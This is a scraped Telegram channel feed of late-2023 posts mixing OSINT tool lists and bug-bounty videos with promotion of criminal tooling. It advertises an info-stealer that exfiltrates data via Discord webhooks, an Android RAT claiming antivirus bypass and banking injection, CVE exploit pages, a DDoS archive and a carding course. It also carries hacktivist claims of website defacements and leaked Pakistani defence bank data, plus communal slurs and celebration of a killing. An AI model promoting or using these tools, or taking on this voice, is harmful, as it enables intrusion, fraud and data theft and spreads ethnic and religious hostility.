2023-12-01 15:06:26
None
2023-12-01 07:43:04
None
2023-12-01 02:59:27
None
2023-11-30 11:00:56
None
2023-11-30 08:26:29
The only OSINT tool you will ever need (ALL in one OSINT Tool)https://youtu.be/Aj0sWUvGbEYJoin @osintambition for more.#osint #privacy #security #infosec #cybersec #opsec
2023-11-30 06:25:43
OSINT Tools for Analyzing Suspicious Emailshttps://www.thunderbird.net/en-US/https://www.browserling.com/https://mxtoolbox.com/https://phishtank.org/https://www.phishtool.com/https://centralops.net/co/https://www.virustotal.com/gui/https://www.talosintelligence.com/https://www.abuseipdb.com/https://urlscan.io/https://any.run/https://www.hybrid-analysis.com/Join @osintambition for more.#osint #phishing #investigations #osinttools #cybersec #Infosec
2023-11-30 05:43:08
If you don't know what is mujeet ? Images
2023-11-30 05:41:04
Mujeet trying to impress his Arab owners Images
2023-11-30 05:38:04
After enroaching Bakra's 🐐 private space !!!Mujeets are now looking for new Adventures !!! Images
2023-11-30 03:28:09
None
2023-11-29 13:43:02
None
2023-11-29 10:41:11
None
2023-11-29 08:05:51
Piracy Search Index We are happy to announce that our piracy search index is now ready for public use.You can use out customized google search engine to find leaked coursed easily.For content creators, it's of great use as they can easily find out where their courses are leaked online, so they can send the owner a copyright or a DMCA takedown.We are also aware that people will be using it for pirating courses. We believe in a safer society, so if suggest that if you can't afford the course at this time, and you have learned from any pirated course. Remember to give to donation to that creator when you are earning some good amount of money. Try to support the content creators in any ways, maybe via donations or giving feedback or via promoting their courses online.We will be adding many more online piracy websites soon.https://cse.google.com/cse?cx=557acd86c63104360Join @osintambition for more.
2023-11-29 07:20:04
𝗗𝗲𝗹𝗲𝘁𝗶𝗻𝗴 𝗘𝘅𝘁𝗲𝗿𝗻𝗮𝗹 𝗦𝘁𝗼𝗿𝗮𝗴𝗲 𝗼𝗳 𝗮𝗻𝘆 𝗨𝘀𝗲𝗿𝘀. 𝗕𝗼𝘂𝗻𝘁𝘆 : 𝟭𝟱𝟬𝟬 $ 😍𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/Nq1HgzEylXE?si=nfUoGSe3nVIcMaS3
2023-11-29 03:55:58
https://system32.ink/umbral-stealer/Umbral Stealer is a fast, lightweight stealer written in C#. The collected data is transferred through discord webhooks.
2023-11-29 00:31:42
Unlock the secrets of the dark web with SOCRadar Labs's Free Dark Web Report! 🌐Find out if your data is lurking in shadowy corners.Stay informed and proactive against potential threats.Discover now: socradar.io/labs/#DailyOSINT #DarkWebReport #Cybersecurity 🕵️‍♂️ Images
2023-11-28 12:58:51
None
2023-11-28 07:32:10
CrackCodes 🇮🇳 pinned «»
2023-11-28 07:30:04
None
2023-11-28 05:33:47
How you can check Pre Account Takeover bug1. Check if application using both normal and Oauth signup.2. Register on app with normal signup, if app is not verifying with your email.3. Register on app with Oauth same email account.4 If Both normal and Oauth account are connected then there is Pre Account Takeover.😎🤟🏻
2023-11-28 02:31:40
App link : https://play.google.com/store/apps/details?id=com.dibd.bhashini Images Images
2023-11-28 00:34:30
INSIDE BONGLADEASH SOFTWARE SOLUTION ;)Greetz to#Team ucc#Team DarkCyber Warrior#Team BlackDragonsec#Team NWH Security#KERALA CYBER BLACK SQUAD#Kerala Cyber Xtractors#INDIAN CYBER SANATANI#silent-one#IndianCyberForce#operationallred For Truly This Reality is a Hell Images Images Images Images
2023-11-27 12:15:09
None
2023-11-27 07:41:52
Hey Hunters and Hackers Subdominator now have been improved and come with a new version with new features it supports now output redirection and more api integration like shodan and hunter.how and with more concurrency and accuracy in results with lot of configurations and also support oneliners with other tool to improve your reconnaissance efficitently with oneliner by combing the results with other tools to know more visit here: https://github.com/sanjai-AK47/Subdominator
2023-11-27 05:13:47
𝗔𝗱𝗱 𝘁𝗵𝗶𝘀 𝗥𝗲𝗰𝗼𝗻 𝗦𝘁𝗲𝗽 𝗶𝗻 𝘆𝗼𝘂𝗿 𝗠𝗲𝘁𝗵𝗼𝗱𝗼𝗹𝗼𝗴𝘆 𝗡𝗼𝘄 😲👇🏻𝗟𝗶𝗻𝗸: https://youtu.be/JTiZgvPQwC4?si=dSChLNgitc9jbIoB𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 & 𝗠𝗮𝗸𝗲 𝘀𝘂𝗿𝗲 𝘆𝗼𝘂 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝗶𝘁 𝗳𝗼𝗿 𝗺𝗼𝗿𝗲 𝗔𝗺𝗮𝘇𝗶𝗻𝗴 𝗩𝗶𝗱𝗲𝗼𝘀🔥
2023-11-27 03:45:47
None
2023-11-26 11:50:52
None
2023-11-26 10:21:13
Check if your email has been breached -#osint #opsec #privacy #security #infosec #cybersec https://haveibeenpwned.com/https://www.breachdirectory.org/https://leak-lookup.com/ (unverified)https://snusbase.com/ (unverified)https://dehashed.com/https://intelx.io/https://leakpeek.com/https://search.0t.rocks/https://monitor.firefox.com/Join @osintambition for more.
2023-11-26 08:54:36
None
2023-11-26 06:33:31
Tools for detecting generative aiFor imageshttps://www.aiornot.com/https://illuminarty.ai/en/For written texts -https://contentatscale.ai/ai-content-detector/https://copyleaks.com/ai-content-detectorhttps://gptzero.me/For voice -https://aivoicedetector.com/https://elevenlabs.io/ai-speech-classifierMixed - https://hivemoderation.com/ai-generated-content-detectionTheir exist many other tools but we personally have tried and found these most efficient among all we tried.Join @osintambition for more.
2023-11-26 05:59:28
Face difficulties in finding bugs. Then you want more knowledge and skill. Try --> bugbountyhunting.com A large collection of articles with examples of finding different types of vulnerabilities: XSS, SSRF, SQLI, RCE, IDOR.
2023-11-26 03:58:44
CrackCodes 🇮🇳 pinned «»
2023-11-26 03:20:55
None
2023-11-25 12:50:45
None
2023-11-25 10:02:58
🎯Join RootSecEmpower yourself with the knowledge and skills to become an ethical hacker and master the intricacies of technology. Join our channel today and gain access to a comprehensive collection of resources and courses designed to elevate your expertise.What you'll find in our channel:👉In-depth tutorials and guides on ethical hacking techniques👉Up-to-date information on the latest cybersecurity threats and vulnerabilities👉Expert insights and practical tips to enhance your technical skills👉A supportive community of fellow learners and professionalsWhether you're a beginner seeking to embark on a career in ethical hacking or an experienced practitioner looking to refine your skills, our channel has something to offer everyone. Join now and take the first step towards becoming a cybersecurity expert.Channel Link: https://t.me/root_Sec
2023-11-25 09:15:32
None
2023-11-24 14:43:12
🧑‍💻 ( Linux Mastery ) Master the Linux Command Line👉 Watch or Download Nowhttps://tgfile.neplix.stream/file/485b3119140Give Reactions For More
2023-11-23 17:10:31
https://github.com/sockysec/Telerecon
2023-11-23 12:23:10
Ethical Hacking: SQL Injection for BeginnersLearn how to do SQL injection Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-23 09:03:00
https://system32.ink/sebua-browser-update-attack/
2023-11-23 05:48:34
Bug : 𝙉𝙤 𝙎𝙌𝙇 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 🧐𝙇𝙞𝙣𝙠: https://youtube.com/shorts/gs8VO_2_Pfs?si=K-1NtUoOvUif3p6Q
2023-11-23 04:50:14
New YouTube UploadedUsername OSINT: Find and Connect to Social Media Profiles using Usernameshttps://youtu.be/Riq1Df3ITcM?siShow some love on the video.#osint #cybersec #infosec #usernameosint #opsec #socialmedia
2023-11-22 20:59:35
Check out our new blog on Unveiling the Digital Shield: A Comprehensive Exploration of Encryption Types, Algorithms, Methods, and Their Critical Role in Cybersecurity Link 🔗 :- https://www.nickcybertech.dev/2023/11/unveiling-digital-shield-comprehensive.html
2023-11-22 17:51:43
⚡⚡ Pakistan🇵🇰 Afghanistan🇦🇫 2 Pakistani Army soldiers were killed in a Taliban attack in North Waziristan this morning
2023-11-22 17:51:17
⚡⚡ Pakistan🇵🇰 Afghanistan🇦🇫 2 Pakistani Army soldiers were killed in a Taliban attack in North Waziristan this morning
2023-11-22 07:36:17
None
2023-11-22 05:23:20
𝗛𝗧𝗠𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗶𝗻 𝗡𝗲𝘅𝘁 𝗖𝗹𝗼𝘂𝗱 ☁️✨𝗕𝗼𝘂𝗻𝘁𝘆 : 𝟱𝟬𝟬$ 😎𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/JDcmTYsaJJ0?si=nxQYCYbzoPw3fcAU
2023-11-22 02:59:52
None
2023-11-22 02:42:55
CANVA HACK - USE CANVA PRO ELEMENTS FOR FREE | NO WATERMARK You're creating a design and the element you want to use requires Canva Pro and you have an annoying watermark in the middle? > Follow these steps:- Search for the element you want- Press CTRL + SHIFT + C to open a selection mode of the Inspect Element function- Tap the element you want to use- This should leave you with an element that begins with "div role", two positions above this you will see an element that begins with "img class", that is the one we are interested in- After the "src" we will see a link that begins with media-public.canva.com, we will copy it and open it in a new tab- Now we just right click, copy image and we will paste it into our Canva project- That's It, Enjoy - Could be Useful- Educational Purpose Only
2023-11-21 14:30:43
🎯 We Offer OFFICIAL exam attempts and subscriptions at AFFORDABLE prices! 🌟 CEHv12 Practical🌟 EC-Council Pro 1 year🌟 Any INE/eLearn Certificates🌟 Any COMPTIA Certificates🌟 Examtopics Unlimited Access 3months🌟 CodeAcademy Pro 1year🌟 CodeAcademy Plus 1year🌟 PNPT🌟 PJPT🌟 Burp Practitioner🌟 Burp Pro 1year🌟 CRTO 1 (Red Team Ops I)🌟 CRTO 2 (Red Team Ops II)🌟 Open RTO Labs 30days🌟 HTB 🌟 THMDM @wh4tebox❤️Join @wh4teboxshopProofs @wh4teboxshopproofs
2023-11-21 14:27:41
A Beginner’s Guide to OSINTUnlocking the Power of Open-Source Intelligence: A Comprehensive Beginner’s Journey into Digital Sleuthing. Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-21 13:22:22
None
2023-11-21 10:54:03
Don't Leave the Channel GuysJoin, Mute and Check when you get timeI've enrolled in 90+ course for Free which would cost me more than 4 Lakhs.Join the channel and share with your friends so you can also get course for Free and get skill you want.https://t.me/telelearn_officialhttps://t.me/telelearn_officialhttps://t.me/telelearn_official Images
2023-11-21 07:48:18
Vichar jarur kare 🙏
2023-11-21 02:35:31
None
2023-11-20 13:24:42
None
2023-11-20 06:30:02
𝗠𝗮𝘀𝘁𝗲𝗿𝗶𝗻𝗴 𝗙𝗙𝗨𝗙 🔥😎It's the Fastest & Adv. Fuzzing Tool. 𝗟𝗮𝗻𝗴𝘂𝗮𝗴𝗲: English𝗣𝗹𝗲𝗮𝘀𝗲 𝗟𝗶𝗸𝗲 & 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝘁𝗼 𝗼𝘂𝗿 𝗬𝗼𝘂𝘁𝘂𝗯𝗲 𝗖𝗵𝗮𝗻𝗻𝗲𝗹 🙏𝙒𝙖𝙩𝙘𝙝 𝙉𝙤𝙬: 👇🏻👇🏻https://youtu.be/w2yF73ASEDo?si=obdU41LWX40AcI6n
2023-11-20 03:27:40
None
2023-11-20 02:57:37
None
2023-11-19 03:12:51
None
2023-11-18 13:06:26
None
2023-11-18 11:54:08
Ethical Hacking: Hack Linux SystemsGet Root on Linux systems Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-18 07:29:49
CrackCodes 🇮🇳 pinned «»
2023-11-18 07:29:26
None
2023-11-18 05:31:57
Complete Windows Password Cracking Course | Practical GuideStep by step guide to bypass, reset and crack Windows passwords. Gain Access to your target cracking its password Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-18 04:12:47
None
2023-11-17 18:59:08
Docker for Beginners: a Hands-On Practice Course (+12 hours)Learn how to create, integrate, run and share your own Docker Images online. Welcome to the World Docker Community !! Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-17 13:18:27
None
2023-11-17 10:22:43
Recon for bug bounty, penetration testers & ethical hackersRecon for bug bounty, penetration testers & ethical hackers. Full methodology of website reconnaissance and bug bounty. Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-17 10:12:01
TOTAL: CompTIA Network+ (N10-008)Everything you need to pass the CompTIA Network+ Exam (N10-008) from Mike Meyers and Joe Ramm! Enroll Now as Soon as Possible. It's Limited for certain time. Images
2023-11-17 06:26:06
𝗘𝘅𝘁𝗿𝗮𝗰𝘁𝗶𝗻𝗴 𝗦𝗲𝗻𝘀𝗶𝘁𝗶𝘃𝗲 𝗘𝗻𝗱𝗽𝗼𝗶𝗻𝘁𝘀 𝗢𝗻𝗲𝗹𝗶𝗻𝗲𝗿🔥😎𝗟𝗶𝗻𝗸: https://twitter.com/thecybertix/status/1725397322606252361?t=h1eyguSX6JQjoYSf-PkQtw&s=19
2023-11-17 04:22:14
None
2023-11-17 02:14:27
CrackCodes 🇮🇳 pinned «https://www.crackcodes.in/2023/11/How-To-Write-Quality-Vulnerability-Reports.html»
2023-11-16 21:39:23
Check out my new blog on XSS (CROSS SITE SCRIPTING ATTACK) BLOG 🔗:- https://www.nickcybertech.dev/2023/11/unveiling-xss-threat-landscape.htmlCREDITS:- @protocolnick Images
2023-11-16 16:30:48
https://www.crackcodes.in/2023/11/How-To-Write-Quality-Vulnerability-Reports.html
2023-11-16 14:45:37
✅ Permanent Share of Cyber Demons India is live ⏺🥷 Join CDI Coding Resources Channel Now ࿗➡️ A one and only Stop for latest Cybersecurity and Coding Content⚡️➗➗➗➗➗➗➗➗➗➗➗➗🪖   ࿗ CDI Cyber Security Channel ࿗           👾    Join Now    👾🟣🟣🟣🟣⚡️🟣🌟🟣⚡️🟣🟣🟣🟣🪖   ࿗ CDI's Handwritten Notes Channel ࿗            🤩    Join Now    🤩➗➗➗➗➗➗➗➗➗➗➗➗🐻 Waiting area : @CYBERDIN1 🐻 Images
2023-11-16 11:03:41
CDI got a new branch of channel for you.Get Paid Udemy Courses for Free using Coupon Code with certificate. Get daily updates of Courses:https://t.me/telelearn_officialCDI ka ek aur Naya branch aygya haiiJoin Karo aur paid udemy courses free maii lo certificate k saath.Join Karohttps://t.me/telelearn_officialhttps://t.me/telelearn_officialhttps://t.me/telelearn_official
2023-11-16 07:06:43
Hi ☃️ Snowman! Join my team on Ice and receive 10 Ice coins when you sign-up using my referral code: https://ice.io/@hayper007
2023-11-16 05:39:17
𝗕𝘂𝘀𝗶𝗻𝗲𝘀𝘀 𝗟𝗼𝗴𝗶𝗰 𝗶𝘀𝘀𝘂𝗲 - Reset Any Password can lead to Account Takeover😨𝗕𝗼𝘂𝗻𝘁𝘆: 𝟭𝟬𝟬𝟬$😎𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/24-nmFxUhjA?si=szwXnJo1lm8zBdROLike & Subscribe to our YouTube channel ✨ For more interesting & Knowledgeable Videos🙏🏻☺️
2023-11-16 04:52:23
https://youtu.be/n3dSWd7NLWs?si=MWD8qE-OKOYvQy_c250+ 𝙑𝙞𝙚𝙬𝙨 🔥✨𝙒𝙖𝙩𝙘𝙝 𝙉𝙤𝙬 ! ! ! 𝙇𝙖𝙣𝙜𝙪𝙖𝙜𝙚: English
2023-11-16 03:05:22
None
2023-11-15 03:31:11
None
2023-11-14 04:04:03
None
2023-11-13 14:11:24
None
2023-11-13 07:28:53
None
2023-11-13 04:42:01
𝗡𝗲𝘄 𝗣𝗹𝗮𝘆𝗹𝗶𝘀𝘁: 𝗕𝘂𝗴𝗕𝗼𝘂𝗻𝘁𝘆😍Watch Now, How to use 𝙬𝙖𝙮𝙗𝙖𝙘𝙠𝙪𝙧𝙡𝙨 𝙞𝙣 𝙮𝙤𝙪𝙧 𝙍𝙚𝙘𝙤𝙣 🤑Please 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 to our YouTube channel🙏🏻𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄: https://youtu.be/n3dSWd7NLWs?si=LPKoDfBDz46wMjTw
2023-11-13 00:19:35
None
2023-11-12 15:50:17
https://pollo.pk/BDS.htmlhttps://smartups.pk/BDS.htmlhttps://solarenergy.pk/BDS.htmlhttps://salamwelfaretrust.org/BDS.htmlhttps://zafarkhansupari.com/BDS.htmlhttps://singaporeplaza.pk/BDS.htmlhttps://securitysystem.pk/BDS.htmlhttps://yiwuburaaq.com/BDS.htmlhttps://markaz.com.pk/BDS.htmltajarwelfarehospital.com/BDS.html 🚩 जय सीताराम 🚩🙏🏼🪔🎇 शुभ दीपावली 🎇🪔🙏🏼#IndianHackers#BlackDragonSec#HappyDiwaliTeaM Images
2023-11-12 03:40:09
https://system32.ink/ddos-archive-by-rootsec/
2023-11-12 02:11:38
⚡️⚡️KhaIistani supporter & close aide of Nijjar, Harpreet Singh Uppal & son, shot dead in CANADA😂😂.UNKNOWN STRIKES AGAIN.Shubh DIWALI!!
2023-11-12 00:03:07
💥🧨सर्वज्ञे सर्ववरदे सर्वदुष्टभयंकरि।सर्वदुःखहरे देवि महालक्ष्मि नमोऽस्तुते ।।माता लक्ष्मी आपके सब कष्ट हरें।🧨💥🙏🏻शुभ दीपावली।।🙏🏻 @crackcodes @cybertrickzone@cyberdin1system32.inkCrackcodes.inTelelearn.in Images
2023-11-11 19:55:41
Happy Diwali Everyone ❤️🪔 Images Images
2023-11-11 19:49:35
Top 10 wireshark filters every cybersecurity professional should know :- https://nikhiltrickzone.blogspot.com/2023/11/top-10-wireshark-filters-every.htmlShare & support our blog ❤️Credits :- @protocolnickHAPPY DIWALI EVERYONE❤️ Images
2023-11-11 14:41:08
Securing Your Website: Understanding SQL Injection, Defending Against SQLi Attacks, and Unveiling Common Techniques :- https://nikhiltrickzone.blogspot.com/2023/11/securing-your-website-understanding-sql.html Images
2023-11-11 04:49:50
🥰हमारे सभी ग्रुप मेंबर्स एवं सहायकों को दिवाली की हार्दिक शुभकामनाएँ !!🥰दीपक की रौशनी💥, पटाखों की आवाज🙉सूरज की किरणे🌼, खुशियों की बोछार🤩चन्दन् की खुशबु😍, अपनों का प्यार🫂मुबारक हो आपको दिवाली का त्योहार !😛!!! ❤️जय श्री राम❤️ !!!Visit : @CYBERDIN1 , @CRACKCODES , @CYBERTRICKSZONE , @Team_ucc , @blackdragonsecOur Websites : crackcodes.in , system32.ink , promcracker.me , telelearn.in Images
2023-11-11 03:00:39
None
2023-11-10 11:22:54
Here's a list of 100 cybersecurity tools:1. Wireshark2. Nmap3. Metasploit4. Burp Suite5. Snort6. Aircrack-ng7. John the Ripper8. Maltego9. Cain and Abel10. Nessus11. OpenVAS12. Wireshark13. Netcat14. tcpdump15. OSSEC16. ModSecurity17. Hydra18. Acunetix19. Qualys20. OWASP ZAP21. Grep22. OWASP Dependency-Check23. Suricata24. OSQuery25. AlienVault OSSIM26. OSSEC27. Wfuzz28. OSQuery29. Fail2ban30. Nikto31. SQLMap32. Zeek (formerly Bro)33. LogRhythm34. QRadar35. Snorby36. QRadar37. IronPort38. AlienVault USM39. Cisco Umbrella40. SolarWinds41. SolarWinds42. ManageEngine OpManager43. Nagios44. Splunk45. ELK Stack46. Stealthwatch47. Intrusion Detection System (IDS)48. Intrusion Prevention System (IPS)49. Kali Linux50. GFI LanGuard51. Wireshark52. tcpdump53. Squid54. Suricata55. FireEye56. Palo Alto Networks57. Blue Coat (Symantec)58. Forcepoint (formerly Websense)59. Crowdstrike60. Carbon Black61. Fiddler62. OWASP WebGoat63. OWASP Mutillidae64. OWASP Juice Shop65. Security Onion66. OSSEC67. Bro (Zeek)68. OWASP ZAP69. Cuckoo Sandbox70. ClamAV71. Snort72. Bro (Zeek)73. HAVP74. Fiddler75. Pyrit76. WPScan77. W3AF78. Tails79. Nipper80. Wfuzz81. THOR82. Wazuh83. Shodan84. TCPReplay85. OWASP Dependency-Check86. RATools87. Xplico88. WhatWeb89. OWASP OWTF90. AIDE91. Cuckoo Sandbox92. OSQuery93. Sagan94. Snorby95. Nikto96. Lynis97. Wazuh98. OSQuery99. Security Onion100. OWASP OWTF
2023-11-10 08:08:12
𝗕𝘂𝗴: Server allows TCP and UDP proxying to internal Network𝗕𝗼𝘂𝗻𝘁𝘆: 𝟯𝟱𝟬𝟬$ 😍𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/DVofk14u_sU?si=mufceg26zW0oqIv_Please Like & Subscribe to our YouTube channel. 🙏. . . Coming Soon, with 𝘽𝙪𝙜 𝘽𝙤𝙪𝙣𝙩𝙮 𝙋𝙡𝙖𝙮𝙡𝙞𝙨𝙩 🔥
2023-11-09 15:36:11
None Images Images
2023-11-09 13:34:53
Safe your Wireless Network.mp4
2023-11-09 10:39:18
CrackCodes 🇮🇳 pinned «What Type Of Materials You Want?»
2023-11-09 07:09:57
Pakistan tops the chart yet again in spreading global terrorism.14 Pakistanis have been arrested for Islamic terror activities in Spain.🌐https://twitter.com/_treeni/status/1722499792759365833🆘🔺@AngrySaffron Images
2023-11-09 07:07:39
𝗖𝗩𝗘-𝟮𝟬𝟮𝟯-𝟮𝟮𝟱𝟭𝟴 - Improper Authorization Vulnerability in Confluence Data Center and Server 𝗢𝗻𝗲𝗹𝗶𝗻𝗲𝗿𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1722510192368328798?t=h10VjaG5Y-GUIM0irSWDMg&s=19
2023-11-08 07:06:34
🚨🚨𝗛𝗲𝗹𝗹𝗼 𝗞𝗶𝘁𝘁𝘆 𝗥𝗮𝗻𝘀𝗼𝗺𝘄𝗮𝗿𝗲 𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝗶𝗻𝗴 𝗔𝗽𝗮𝗰𝗵𝗲... 🚨🚨😨𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄: https://youtube.com/shorts/V3VaFeoVZ2U?si=fXTqKvlYc0tqXdeO
2023-11-08 05:01:01
None
2023-11-08 03:06:11
None
2023-11-07 13:25:52
None
2023-11-07 08:22:46
Happy Diwali in Advance😁 to all our Hindu friends and supporters! May the festival of lights bring joy, prosperity, and blessings to you and your loved ones.Exciting news! We're launching a new Hindu supporter news channel dedicated to providing accurate and unbiased coverage of important issues for the Hindu community. This channel will be a valuable resource for sharing underrepresented news and perspectives. Best wishes to the team behind this effort. Jai Shri Ram!Follow us 🤗Telegram - @IndicWatchhttps://instagram.com/indicwatch?igshid=NzZlODBkYWE4Ng==https://twitter.com/IndicWatch Images
2023-11-07 02:37:14
https://system32.ink/mybb-cve-2023-46251-stored-dom-xss/
2023-11-06 14:55:13
CrackCodes 🇮🇳 pinned «https://system32.ink/confluence-server-cve-2023-22518-exploit/»
2023-11-06 14:53:57
https://system32.ink/confluence-server-cve-2023-22518-exploit/
2023-11-06 13:34:44
The Full Stack React Course 2023 FreeBy developedbyed.comIn this course, you’ll learn to create an e-commerce application using following technologies:👉 Next.js👉 Tailwind CSS👉 PostgreSQL👉 Prisma👉 Daisy UI👉 Stripe👉 Zustand👉 Next-auth👉 Vercel for Deploymenthttps://telelearn.in/the-full-stack-react-course-2023-free/
2023-11-06 07:43:39
जैसा की आप सब लोग जानते हि होंगे की काफी सारे अधर्मी काफी कोशिशें कर रहे है सनातन धर्म को ठेस पहुंचने की तो उसी के लिए यह चैनल बनाया गया है !!इस चैनल मे हम सनातन धर्म से जुड़ी हुई जितनी भी गलतफैमिया या गलत बातें फैलाई जारी है उनका खंडन किया जायेगा ओर सनातन धर्म की शिक्षा दी जाएगी !!https://t.me/sanatandharmCDI
2023-11-06 04:16:41
https://telelearn.in/certified-information-systems-security-professional-cissp-course/
2023-11-05 08:55:11
Sir I am hosting a THM giveawayhttps://t.me/wh4teboxshop/24Please participate 🥰Your viewers maybe interested❤
2023-11-05 02:42:32
https://system32.ink/apache-activemq-rce-cve-2023-46604-exploit/
2023-11-04 17:31:32
Carding Full Course Free Download 👉 https://telelearn.in/full-carding-course-free-download/Carding typically refers to a range of illegal activities involving the fraudulent use of credit card information. Earn Money using Telegram: https://t.ly/ET3rD
2023-11-04 08:50:24
None
2023-11-04 06:02:09
📂 Udemy : The Complete Python Hacking Course: Beginner to Advanced https://telelearn.in/the-complete-python-hacking-course-beginner-to-advanced/🖥 Description : The Complete Python Hacking Course: Beginner to Advanced is a comprehensive online course that teaches individuals with little or no programming experience how to use Python for hacking and cybersecurity purposes. The course covers a wide range of topics, including network scanning, vulnerability assessment, exploit development, password cracking, and more. It provides step-by-step tutorials, practical examples, and hands-on exercises to help students understand and apply the concepts effectively. By the end of the course, participants will have gained the skills and knowledge needed to identify and secure vulnerabilities in computer systems using Python.Earn Money using Telegram: https://t.ly/ET3rD
2023-11-03 11:25:52
None
2023-11-02 16:15:37
None
2023-11-02 11:07:39
We're continuously expanding our community for ease access of Information, and Learning. In the process, we have been sharing Free Resources through telegram and Websites. Here's our Network:➡️ Telegram Channels:1. @CYBERDIN1 - Waitlist 2. @cdinotes - Handwritten Notes3. @cdilibrary - Library4. @crackcodes - Free Resources 5. @cybertrickzone - Free Courses6. @geek_hkr - Educational Content7. @CodeSecurityVault - Free Ebooks PDF content➡️ Websites:1. Exploits, Malwares and Database-> https://system32.ink2. Blogs & News-> https://crackcodes.in-> https://mcracker.org3. Earn Using Telegram 💵-> https://TeleLearn.in4. Free Movies-> https://neplix.stream➡️ Telegram Bots:1. @CDI_COURSES_BOT - Free Courses ( Request Courses )2. Free Storage - @Cloud_Neplix_Bot , @System32Download_bot3. AI Assistant ( With Bard ) - @studentforumbotWe expect same support and love from you all.Regards,CDI TeamCTZ TeamSystem32 & Crackcodes Team
2023-11-02 10:19:06
https://telelearn.in/map-malware-analysis-professional-v1-course-free-download/
2023-11-02 06:59:26
𝗢𝗽𝗲𝗻 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁𝗶𝗼𝗻 𝘁𝗼 𝗫𝗦𝗦 𝘄𝗶𝘁𝗵 𝗪𝗔𝗙 𝗕𝘆𝗽𝗮𝘀𝘀 🔥𝗖𝗵𝗲𝗰𝗸 𝗼𝘂𝘁 𝗻𝗼𝘄 :https://twitter.com/thecybertix/status/1719971782667784526?t=roHQWzbr4ncXn843fT05yg&s=19
2023-11-02 05:26:23
None
2023-11-02 05:25:27
CrackCodes 🇮🇳 pinned «»
2023-11-02 02:05:40
None
2023-11-01 04:07:33
Are you a Telegram user passionate about sharing free courses, content, or valuable information? TeleLearn is the perfect platform for you!What TeleLearn Offers:1. Easy registration and login.2. Simple post creation3. Earn money for your quality posts.4. Be a part of the Free Knowledge community.Get started today and start making a difference. Learn More: https://telelearn.in/how-to-add-post-for-revenue-in-telelearn/
2023-11-01 02:21:51
None
2023-10-31 12:54:38
𝗫𝗦𝗦 𝗼𝗻 𝗦𝗹𝗮𝗰𝗸 🔥😨𝗕𝗼𝘂𝗻𝘁𝘆 : 𝟭𝟬𝟬𝟬$𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/DGJvqzhshhA?si=aiqxbw4xu7VEXq82
2023-10-31 07:02:45
None
2023-10-31 05:01:57
IRON MAN OF INDIA 🇮🇳👏🔥🙏 , REMEMBERING HIS UNCOUNTABLE SACRIFICES FOR OUR NATION ON HIS BIRTH ANNIVERSARY. #LEGEND Images Images
2023-10-30 23:34:36
⚠️ PWDTA Government of Bangladesh hosting permanently suspended by us ❌Site :- https://pwdta.gov.bd/FEEL THE POWER OF --> ֆɨʟɛռȶ օռɛ <--#OpBangladesh #OpPalestine #Bangladesh #Palestine #OpHamas#JaiShreeRam 🚩#SilentOne 🔥Join - t.me/S1L3NT_0N3 Images
2023-10-30 17:55:26
Anybody have centos7.9 (vps) or any other version contact me @cyberdin
2023-10-30 12:39:59
None
2023-10-30 06:15:24
Burp Suite 101 For Beginners🔥#1 - Introduction and Installation:🔗 hacklido.com/blog/621#2 - Understanding Navigation, Dashboard, Configuration:🔗hacklido.com/blog/624#3 - Exploring Burp Proxy and Target Specification:🔗hacklido.com/blog/625#4 - Exploring Burp Repeater and Burp Comparer:🔗hacklido.com/blog/628#5 - Going deep Into intruder:🔗hacklido.com/blog/631Covering @Burp_Suite By @calc1f4r & @hacklido.#BurpSuite #Hacking #Infosec #CyberSecurity #RedTeam
2023-10-29 23:37:35
Pakistan's Ministry Of Defence Project Details is compromised Due to continuous attempts of Cyberattack on Indian Defence & other sectors. Details are Bank, Address (Ops base), Acc No, Div, Project Name, and Balance.There are total ~400 Secret Defence Proj & ~20k Acc in Pak. Images Images Images
2023-10-29 13:06:36
None
2023-10-29 07:24:52
जैसा की आप सब लोग जानते हि होंगे की काफी सारे अधर्मी काफी कोशिशें कर रहे है सनातन धर्म को ठेस पहुंचने की तो उसी के लिए यह चैनल बनाया गया है !!इस चैनल मे हम सनातन धर्म से जुड़ी हुई जितनी भी गलतफैमिया या गलत बातें फैलाई जारी है उनका खंडन किया जायेगा ओर सनातन धर्म की शिक्षा दी जाएगी !!https://t.me/sanatandharmCDI
2023-10-29 03:08:42
CrackCodes 🇮🇳 pinned a video
2023-10-29 03:07:17
DogeRat v5 Demo- Added• Locker - Lock/Unlock Device• Open link in browser directly• Auto Permission Like CraxRat• Bypass all antivirus• Crypto exchange Injection• Banking Injection• Custom phishing• Stable in All Android versions•And All old features .... Know more :https://github.com/shivaya-dav/DogeRat-PremiumBuy now @shivaya_davRequest: please share this in your channel, I will bring free version update soon 🙂
2023-10-28 15:46:33
Web Application Pentesting 👩‍💻 Images
2023-10-28 06:23:53
https://system32.ink/landstar-power-ontario-canada-data-leak/
2023-10-28 04:17:17
Easiest explanation of OWASP 10 i ever saw...
2023-10-27 18:38:33
Metasploit basics
2023-10-27 18:38:16
Linux Mastery Master Command Line
2023-10-27 15:27:10
